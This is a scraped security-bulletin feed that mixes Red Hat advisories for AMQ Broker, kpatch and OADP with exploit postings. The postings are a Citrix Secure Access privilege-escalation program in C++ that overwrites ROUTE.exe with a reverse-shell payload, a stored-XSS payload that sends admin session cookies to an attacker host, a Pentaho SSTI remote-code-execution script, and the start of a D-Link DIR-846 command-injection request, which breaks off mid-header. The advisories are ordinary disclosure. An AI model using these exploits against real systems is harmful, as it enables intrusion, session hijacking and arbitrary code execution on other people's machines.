Red Hat Security Advisory 2023-1661-01 - AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms. This release of Red Hat AMQ Broker 7.11.0 includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section. Issues addressed include denial of service, information leakage, and traversal vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat AMQ Broker 7.11.0 release and security update  
Advisory ID:       RHSA-2023:1661-01  
Product:           Red Hat JBoss AMQ  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1661  
Issue date:        2023-04-05  
CVE Names:         CVE-2022-1278 CVE-2022-2047 CVE-2022-3782   
                   CVE-2022-22970 CVE-2022-22971   
=====================================================================

1. Summary:

Red Hat AMQ Broker 7.11.0 is now available from the Red Hat Customer  
Portal.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

AMQ Broker is a high-performance messaging implementation based on ActiveMQ  
Artemis. It uses an asynchronous journal for fast message persistence, and  
supports multiple languages, protocols, and platforms.

This release of Red Hat AMQ Broker 7.11.0 includes security and bug fixes,  
and enhancements. For further information, refer to the release notes  
linked to in the References section.

Security Fix(es):

* keycloak: path traversal via double URL encoding (CVE-2022-3782)

* springframework: DoS via data binding to multipartFile or servlet part  
(CVE-2022-22970)

* springframework: DoS with STOMP over WebSocket (CVE-2022-22971)

* WildFly: possible information disclosure (CVE-2022-1278)

* jetty-http: improver hostname input handling (CVE-2022-2047)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying the update, back up your existing installation, including  
all applications, configuration files, databases and database settings.

The References section of this erratum contains a download link (you must  
log in to download the update).

4. Bugs fixed (https://bugzilla.redhat.com/):

2073401 - CVE-2022-1278 WildFly: possible information disclosure  
2087272 - CVE-2022-22970 springframework: DoS via data binding to multipartFile or servlet part  
2087274 - CVE-2022-22971 springframework: DoS with STOMP over WebSocket  
2116949 - CVE-2022-2047 jetty-http: improver hostname input handling  
2138971 - CVE-2022-3782 keycloak: path traversal via double URL encoding

5. References:

https://access.redhat.com/security/cve/CVE-2022-1278  
https://access.redhat.com/security/cve/CVE-2022-2047  
https://access.redhat.com/security/cve/CVE-2022-3782  
https://access.redhat.com/security/cve/CVE-2022-22970  
https://access.redhat.com/security/cve/CVE-2022-22971  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=jboss.amq.broker&version=7.11.0  
https://access.redhat.com/documentation/en-us/red_hat_amq_broker/7.11

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZC2QgdzjgjWX9erEAQgh7g/9Fxo77qJyi1BYZXuL3Se7Re5XXXNKE2zL  
CvG5GAWevIBpp/o648CEu/GrUFDCwGeqpvYM/2nEPsVfIPTo7ulpklLKEE3ortZs  
PnLyY2jWe3MQ0AEYDvLMvbOoCRU0GsJyhiMMs57DeqKFvXobadS5QmMH7IvWvldG  
xVboltSxsg0hf7f+8YrOPf/iVcel3LJiIBTpud2ZORPQJ6V4bbOjdeTkS/tR+I+p  
oIxCjitPSpHYdVSlRH+7GGrccsBy6n0jAOXI/Rj2Eobx4jSQxnLSJPwUMtIVPcS5  
xx5kkf2ev39UwDsh8rLoaYyfvLYOvnU6gJ3XJp1aGRAvbZ34IL/z2/wbimxgJrrC  
1b6icxwvFiCYa0PtgISColuS96TfuYCqxSJ7mt5JCRB4WteWgWcEFHnwQ8Dsh7lN  
6DAhkFXdAfuZSy6pHNETPETunxOkXYRln/MSKEVp/DktLAQ1ysfxMhUIKdXXhtxP  
4UiM8QCrH0xom6j64MyepQueW7CQs619e0yEUTy/pfWYp+hZRHJYw3fl+lLrW6mH  
2QFxQ8YUv2VCUAz7mfr120IGDj51aeV88Hvd/JOn3S2oZqbbdrkHHemztsbJ1v9O  
txFwDMwk3U0tMPjtlVHP/hVJi1DrDNE1kekywqoResWsRXT4p0miGg9pVNk5teim  
JSgfDf/rTn4=  
=Z9zN  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1661-01

Citrix versions 22.2.1.103 and 23.1.1.11 suffer from a local privilege escalation vulnerability.

    //Discovered by:: TOUHAMI KASBAOUI - VXREMALWARE//Discover date : 25/03/2023//Reported to Citrix: 25/03/2023//Tested Version: 22.2.1.103, 23.1.1.11/Last version//Exploit: https://github.com/sqrtZeroKnowledge/Citrix_Secure_Access_LPE_0DAY#define UNICODE#define _UNICODE#include <Windows.h>#include <string>#include <iostream>#include <Windows.h>#include <iostream>using namespace std;enum Result{    unknown,    serviceManager_AccessDenied,    serviceManager_DatabaseDoesNotExist,    service_AccessDenied,    service_InvalidServiceManagerHandle,    service_InvalidServiceName,    service_DoesNotExist,    service_Exist};Result ServiceExists(const std::wstring& serviceName){    Result r = unknown;    SC_HANDLE manager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, GENERIC_READ);    if (manager == NULL)    {        DWORD lastError = GetLastError();        if (lastError == ERROR_ACCESS_DENIED)            return serviceManager_AccessDenied;        else if (lastError == ERROR_DATABASE_DOES_NOT_EXIST)            return serviceManager_DatabaseDoesNotExist;        else            return unknown;    }    SC_HANDLE service = OpenService(manager, serviceName.c_str(), GENERIC_READ);    if (service == NULL)    {        DWORD error = GetLastError();        if (error == ERROR_ACCESS_DENIED)            r = service_AccessDenied;        else if (error == ERROR_INVALID_HANDLE)            r = service_InvalidServiceManagerHandle;        else if (error == ERROR_INVALID_NAME)            r = service_InvalidServiceName;        else if (error == ERROR_SERVICE_DOES_NOT_EXIST)            r = service_DoesNotExist;        else            r = unknown;    }    else        r = service_Exist;    if (service != NULL)        CloseServiceHandle(service);    if (manager != NULL)        CloseServiceHandle(manager);    return r;}int main() {    const uint8_t shellcode[7168] = {        0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00,        0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,    }; //You can set array bin of your reverse shell PE file here    std::wstring serviceName = L"aoservice";    Result result = ServiceExists(serviceName);    if (result == service_Exist)        std::wcout << L"The service '" << serviceName << "' exists." << std::endl;    else if (result == service_DoesNotExist)        std::wcout << L"The service '" << serviceName << "' does not exist." << std::endl;    else        std::wcout << L"An error has occurred, and it could not be determined whether the service '" << serviceName << "' exists or not." << std::endl;         HANDLE fileHandle = CreateFile(L"C:\\Program Files\\Citrix\\Secure Access Client\\ROUTE.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);    cerr << "[*] Loading Malicious file into Citric Secure Access Installer \n";    if (fileHandle == INVALID_HANDLE_VALUE) {        cerr << "Failed to create shellcode\n";        return 1;    }    DWORD bytesWritten;    if (!WriteFile(fileHandle, shellcode, sizeof(shellcode), &bytesWritten, NULL)) {        cerr << "Failed to write to file\n";        CloseHandle(fileHandle);        return 1;    }    CloseHandle(fileHandle);    cout << "Shellcode exported to Citrix Secure Access path \n";    return 0;}

Citrix 22.2.1.103 / 23.1.1.11 Local Privilege Escalation

Red Hat Security Advisory 2023-1660-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:1660-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1660  
Issue date:        2023-04-05  
CVE Names:         CVE-2023-0266 CVE-2023-0386   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v.8.6) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF  
(CVE-2023-0266)

* kernel: FUSE filesystem low-privileged user privileges escalation  
(CVE-2023-0386)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2159505 - CVE-2023-0386 kernel: FUSE filesystem low-privileged user privileges escalation  
2163379 - CVE-2023-0266 ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.6):

Source:  
kpatch-patch-4_18_0-372_26_1-1-6.el8_6.src.rpm  
kpatch-patch-4_18_0-372_32_1-1-5.el8_6.src.rpm  
kpatch-patch-4_18_0-372_36_1-1-4.el8_6.src.rpm  
kpatch-patch-4_18_0-372_40_1-1-4.el8_6.src.rpm  
kpatch-patch-4_18_0-372_41_1-1-3.el8_6.src.rpm  
kpatch-patch-4_18_0-372_46_1-1-1.el8_6.src.rpm

ppc64le:  
kpatch-patch-4_18_0-372_26_1-1-6.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_26_1-debuginfo-1-6.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_26_1-debugsource-1-6.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_32_1-1-5.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_32_1-debuginfo-1-5.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_32_1-debugsource-1-5.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_36_1-1-4.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_36_1-debuginfo-1-4.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_36_1-debugsource-1-4.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_40_1-1-4.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_40_1-debuginfo-1-4.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_40_1-debugsource-1-4.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_41_1-1-3.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_41_1-debuginfo-1-3.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_41_1-debugsource-1-3.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_46_1-1-1.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_46_1-debuginfo-1-1.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_46_1-debugsource-1-1.el8_6.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-372_26_1-1-6.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_26_1-debuginfo-1-6.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_26_1-debugsource-1-6.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_32_1-1-5.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_32_1-debuginfo-1-5.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_32_1-debugsource-1-5.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_36_1-1-4.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_36_1-debuginfo-1-4.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_36_1-debugsource-1-4.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_40_1-1-4.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_40_1-debuginfo-1-4.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_40_1-debugsource-1-4.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_41_1-1-3.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_41_1-debuginfo-1-3.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_41_1-debugsource-1-3.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_46_1-1-1.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_46_1-debuginfo-1-1.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_46_1-debugsource-1-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0266  
https://access.redhat.com/security/cve/CVE-2023-0386  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZC2QfNzjgjWX9erEAQgNNg/9Eho8CXtXoHqZQdLrGhk/KvGhNdZ75hDt  
nARC7hATfax98FiwvYMvEcL9ZdBGzrxcsd9yXmE+TT8pKlu2x2AX10Y8EAKg76GX  
YSWS6YpVHmrxi2pV7w5WjPqY+Xz7pbTxhCqXxJF6AeiaDgpq29N8XxlIwy12VNey  
N6RuS9pUQ9JjuE3RnxYdWUD1AzHFjM9OZsSs1jEJr9RLKzoYHuo9SD+Md7PAyaba  
ifrzTxNOcAfbZME1O30dObcKgJM10No4gTvxrwA7V6ZSHMNl9qn9mtKFdGrqnl70  
RHXL4NkeJJJ2yDw9SEqQevc/tPfP2rqEenn35UK6smANdXNL2OQ1GLXnCu+rF6e9  
KOltIkQJ+ypYU5ot5g6KsvlCB4vXJ1FJe5aBAhHrKpuQds7IkyNoy9mPoIs/Mjen  
bS2dX7AsI3uT28qxkrsEQRGS9Okh2FsMQjjLe+f0KeerxA8e5feVJBRUS42Schab  
TTw2NU5W+sfRa20kDcm/fkt/7Ft8qFRnUHqAbJTlvvepL8hodl2RtU0eymACVk0T  
kTRK44aoZJFbLAbTuiQHFlDTnWi+0O2PoFga5l5XhbF/9zc6hk29rR0hM1BbcHje  
LBWtNTttvPBwBg5hv1/VvCniiIVMPYvcRYg5RDAA3knXd5IEtOats4UBTTxnVg0W  
sQWzQbcINb0=  
=plbD  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1660-01

Bus Pass Management System version 1.0 suffers persistent cross site scripting vulnerabilities.

    # Exploit Title: Bus Pass Management System 1.0  - Stored Cross-Site Scripting (XSS)# Date: 2021-09-17# Exploit Author: Matteo Conti - https://deltaspike.io# Vendor Homepage: https://phpgurukul.com/# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip# Version: 1.0# Tested on: Ubuntu 18.04 - LAMP# DescriptionThe application permits to send a message to the admin from the section "contacts". Including a XSS payload in title or message,maybe also in email bypassing the client side controls, the payload will be executed when the admin will open the message to read it.# Vulnerable page: /admin/view-enquiry.php?viewid=1 (change the "view id" according to the number of the message)# Tested Payload: <img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie># Prof of concept:- From /contact.php, send a message containing the following payload in "title" or "message" fields:<img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie>(the first url have to be an existing image)- Access with admin credentials, enter to /admin/unreadenq.php and click "view" near the new message to execute the payload. After the first view, you can execute again the payload from /admin/readenq.php- Your listener will receive the PHP session id.

Bus Pass Management System 1.0 Cross Site Scripting

Red Hat Security Advisory 2023-1639-01 - OpenShift API for Data Protection enables you to back up and restore application resources, persistent volume data, and internal container images to external backup storage. OADP enables both file system-based and snapshot-based backups for persistent volumes. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenShift API for Data Protection (OADP) 1.1.3 security and bug fix update  
Advisory ID:       RHSA-2023:1639-01  
Product:           OpenShift API for Data Protection  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1639  
Issue date:        2023-04-05  
CVE Names:         CVE-2022-41724 CVE-2022-41725 CVE-2023-23916   
=====================================================================

1. Summary:

OpenShift API for Data Protection (OADP) 1.1.3 is now available.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

OpenShift API for Data Protection (OADP) enables you to back up and restore  
application resources, persistent volume data, and internal container  
images to external backup storage. OADP enables both file system-based and  
snapshot-based backups for persistent volumes.

Security Fix(es):

* golang: crypto/tls: large handshake records may cause panics  
(CVE-2022-41724)

* golang: net/http, mime/multipart: denial of service from excessive  
resource consumption (CVE-2022-41725)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2178488 - CVE-2022-41725 golang: net/http, mime/multipart: denial of service from excessive resource consumption  
2178492 - CVE-2022-41724 golang: crypto/tls: large handshake records may cause panics

5. References:

https://access.redhat.com/security/cve/CVE-2022-41724  
https://access.redhat.com/security/cve/CVE-2022-41725  
https://access.redhat.com/security/cve/CVE-2023-23916  
https://access.redhat.com/security/updates/classification/#moderate

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZC08PdzjgjWX9erEAQhicQ/+IXpHurSFokjaaa1BxijL3DsThUTLVbts  
4LvasCOx9o0bjJ8l08mLPocVojz7VEbxJ9/bsk+GnfxwWaO4fwj5rqbdvCJvWu6P  
tV3thNPABCgAfq4HLd4dT/O/tap0XuFCzhXLRs5fo4amuMlcsrfvSKd8aplQVjXb  
7P7gP/IlxaLWpZqvganRdMaiAqm+X7eukxs2rEz0urSHFKLkBE8Wg4BHCRk5Kp+V  
uBC4KcRrzQQxsAQJk7ACBM6Mk/ankKbsEKzdkeIlLTymNNz1OzCnjDpqgSkrnFNm  
n18nkUuv5LHVjLERWJHtIS8XUoNpWX1139l3cAVAonkTJTHQP4Pu8cSJ0YIVcNTM  
muxyZoI1GucrV4adoYPEnLeU2F0yCV1udkz4E3aYOfnMz4YxIMwb2c8K49ukdGbj  
t/JI07x3vUITb+bwu353gvnaJFsuu07O9uDUwGy01Rs2v9huY/a2KJGguRIOV0b6  
9gNqe/S/hHhzGHSBdip2iiewMdA0uJ7tsU6syA5adjRD2vPo9DvzttiNNMpUdYyu  
58YFZvAWRxos0dycLecDX51s5KDzC599Y55SDjMsO6PI/9DVUTUU7kQY91MuOdAh  
nkpWyFFILYCDdEpDTpvDvXkMLvDd49aU/ypACEEvmnxIC2GIvOwMjiFzHw6OdwxS  
1F3uzGkRFO8=  
=wnE7  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1639-01

Pentaho BA Server EE version 9.3.0.0-428 suffers from a remote code execution vulnerability via a server-side template injection flaw.

**Pentaho BA Server EE 9.3.0.0-428 Server-Side Template Injection / Remote Code Execution**

    # Title: Pentaho BA Server EE 9.3.0.0-428 - RCE via Server-Side Template Injection (Unauthenticated)# Author: dwbzn# Date: 2022-04-04# Vendor: https://www.hitachivantara.com/# Software Link: https://www.hitachivantara.com/en-us/products/lumada-dataops/data-integration-analytics/download-pentaho.html# Version: Pentaho BA Server 9.3.0.0-428# CVE: CVE-2022-43769, CVE-2022-43939# Tested on: Windows 11# Credits: https://research.aurainfosec.io/pentest/pentah0wnage# NOTE: This only works on the enterprise edition. Haven't tested it on Linux, but it should work (don't use notepad.exe).# Unauthenticated RCE via SSTI using CVE-2022-43769 and CVE-2022-43939 (https://research.aurainfosec.io/pentest/pentah0wnage)import requestsimport argparseparser = argparse.ArgumentParser(description='CVE-2022-43769 + CVE-2022-43939 - Unauthenticated RCE via SSTI')parser.add_argument('baseurl', type=str, help='base url e.g. http://127.0.0.1:8080/pentaho')parser.add_argument('--cmd', type=str, default='notepad.exe', nargs='?', help='command to execute (default notepad.exe)', required=False)args = parser.parse_args()url = f"{args.baseurl}/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{{T(java.lang.Runtime).getRuntime().exec('{args.cmd}')}}&mgrDn=a&pwd=a"print ("running...")r = requests.get(url)if r.text == 'false':    print ("command should've executed! nice.")else:    print ("didn't work. sadge...")

Pentaho BA Server EE 9.3.0.0-428 Server-Side Template Injection / Remote Code Execution

Red Hat Security Advisory 2023-1662-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:1662-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1662  
Issue date:        2023-04-05  
CVE Names:         CVE-2023-0266 CVE-2023-0461   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
8.4 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v.8.4) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF  
(CVE-2023-0266)

* kernel: net/ulp: use-after-free in listening ULP sockets (CVE-2023-0461)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2163379 - CVE-2023-0266 ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF  
2176192 - CVE-2023-0461 kernel: net/ulp: use-after-free in listening ULP sockets

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.4):

Source:  
kpatch-patch-4_18_0-305_65_1-1-5.el8_4.src.rpm  
kpatch-patch-4_18_0-305_71_1-1-4.el8_4.src.rpm  
kpatch-patch-4_18_0-305_72_1-1-3.el8_4.src.rpm  
kpatch-patch-4_18_0-305_76_1-1-2.el8_4.src.rpm  
kpatch-patch-4_18_0-305_82_1-1-1.el8_4.src.rpm

ppc64le:  
kpatch-patch-4_18_0-305_65_1-1-5.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_65_1-debuginfo-1-5.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_65_1-debugsource-1-5.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_71_1-1-4.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_71_1-debuginfo-1-4.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_71_1-debugsource-1-4.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_72_1-1-3.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_72_1-debuginfo-1-3.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_72_1-debugsource-1-3.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_76_1-1-2.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_76_1-debuginfo-1-2.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_76_1-debugsource-1-2.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_82_1-1-1.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_82_1-debuginfo-1-1.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_82_1-debugsource-1-1.el8_4.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-305_65_1-1-5.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_65_1-debuginfo-1-5.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_65_1-debugsource-1-5.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_71_1-1-4.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_71_1-debuginfo-1-4.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_71_1-debugsource-1-4.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_72_1-1-3.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_72_1-debuginfo-1-3.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_72_1-debugsource-1-3.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_76_1-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_76_1-debuginfo-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_76_1-debugsource-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_82_1-1-1.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_82_1-debuginfo-1-1.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_82_1-debugsource-1-1.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0266  
https://access.redhat.com/security/cve/CVE-2023-0461  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZC2QfNzjgjWX9erEAQjDDg//eEgJoqhJcHFm5gO0BE3zMQaoc9+bVd5a  
GrZ9j9cpJlpywY8uLTfBCA4pbEKgZEitEY5FMSTwdPjYviOsE5rd7byww9ualHtG  
FDlERdRhnulIfq7wAS0Lb//sCyqNw6rsVE2dTNXxuNLqDCgsZjKBq8S+XF+Ag2wJ  
pBvOYW3a4abK3vbV7beH+syXD39NCJ1m6bhTvLbdxfJHgMjyquz8IeIcVL43rhtq  
nXUce/YJKU2Roz0Iz+NUMEPfXfBny5/jfV+ChMO8Ga/joc1HQPdLSgc42J85tTmv  
m8BIL+iHiVendKY4E5DwTB49ae8CTDIcqPtzY6EVCxwbq0kxHhKsA2Ud+z+ziBQe  
l7p+19eM3OBveLmeHgVOziBUQhVmy2joiWU6iaYYrcon/S8BOKQZQ3AeAAaY5niF  
npBv9or4FbfTWjVDb8R8t3AQSqy54ssmvNjfXeih2QGV9ewyn8JS8Lw3/YOmV5Zu  
1knYj3k+Lvc8GSuZuL2a/yLTyG4J+DwVAaZQpJJzKhZxyEx1tUCCw9VIBakXc9VQ  
j8hpx8GfbShhD+oJGQkUyffmE2Y03+FnsQzNfByjoThnC/rtEvfLk4VSpHZ0qjs6  
F9vNoKhA93+GR0L3h5u6ZMDGEA+NbmmwTMrrBV+fLcMkYGJZDzCKNuRG0jZTL/CF  
S5Hii87MsGw=  
=tQuy  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1662-01

D-Link DIR-846 suffers from a remote command execution vulnerability.

    # Exploit Title: D-Link DIR-846 - Remote Command Execution (RCE) vulnerability # Google Dork: NA# Date: 30/01/2023# Exploit Author: Françoa Taffarel# Vendor Homepage:https://www.dlink.com.br/produto/roteador-dir-846-gigabit-wi-fi-ac1200/#suportehttps://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip# Software Link:https://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip# Version: DIR846enFW100A53DBR-Retail# Tested on: D-LINK DIR-846# CVE : CVE-2022-46552D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remotecommand execution (RCE) vulnerability via the lan(0)_dhcps_staticlistparameter. This vulnerability is exploited via a crafted POST request.### Malicious POST Request```POST /HNAP1/ HTTP/1.1Host: 192.168.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101Firefox/107.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/jsonSOAPACTION: "http://purenetworks.com/HNAP1/SetIpMacBindSettings"HNAP_AUTH: 0107E0F97B1ED75C649A875212467F1E 1669853009285Content-Length: 171Origin: http://192.168.0.1Connection: closeReferer: 